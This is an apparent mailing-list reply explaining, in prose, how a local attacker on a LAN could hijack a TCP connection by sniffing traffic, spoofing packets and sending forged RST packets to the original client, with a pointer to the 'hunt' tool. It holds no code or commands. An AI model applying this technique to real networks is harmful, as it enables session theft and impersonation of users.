Re: Forge packets ?

["Samy Kamkar [CommPort5]" <CommPort5 () LUCIDX COM>]

Sure, it's very possible.  You may want to see 'hunt' (program, probably on
packetstorm.securify.com) and see how it does it.  Also, RFC 793 (TCP) will
describe tcp connections...once you understand that you will see how a
connection is hijacked.  Thing is, with your network you can send packets
looking exactly like ones coming from the local side so the remote
connection would accept it.  And also, you're able to sniff the connection
so you see exactly what the remote connection is sending back.  If you want
to fully hijack it (so other user can't send/recieve any more) you could
'probably' send RST packets to the other local connection (looking like
connections from the remote host) and you continue to send your packets to
the remote host so the connection will only be dropped on the local side of
the original client but the connection keeps on going while you're sending
the packets.  I'm not sure if you can just send RST packets to local without
that local sending packets to close the connection on remote so you get a
fully closed connection but I'm sure you can fully hijack a connection
without problems (local-to-remote, or other way around).  This would
definately require root (depending on the system, sometimes just certain
access to specific devices such as bpf) though...

-Sam [commport5]


Skreel wrote:

> I have a few questions concerning forged packets.
> I got a LAN that's connected to Internet, and I would like to know if it
> could be
> possible for a local attacker to hijack a "local-to-remote" connection in
> order
> to send forged packets without resetting the user's connection.
> thanks